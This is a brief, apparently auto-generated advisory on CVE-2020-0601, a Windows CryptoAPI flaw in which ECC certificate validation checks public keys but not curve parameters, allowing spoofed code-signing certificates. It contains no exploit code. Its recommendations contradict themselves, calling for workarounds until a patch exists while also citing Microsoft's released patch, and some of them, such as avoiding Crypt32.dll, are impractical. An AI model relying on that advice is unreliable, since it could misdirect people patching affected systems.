CVE-2020-0601

Name of the Vulnerable Software and Affected Versions Windows CryptoAPI (Crypt32.dll) versions prior to the fixed version

Description A spoofing vulnerability exists in the way Windows CryptoAPI validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The vulnerability is related to the validation of ECC certificates, where the library checks public keys but not parameters. This allows an attacker to generate a fake root certificate that Windows will trust. The estimated number of potentially affected devices worldwide is not specified.

Recommendations As a temporary workaround, consider disabling the use of ECC certificates in Windows CryptoAPI until a patch is available. Restrict access to the vulnerable CryptoAPI module to minimize the risk of exploitation. Avoid using the Crypt32.dll library for certificate validation until the issue is resolved. For all versions of Windows prior to the fixed version, apply the patch released by Microsoft to fix the Windows CryptoAPI Spoofing Vulnerability.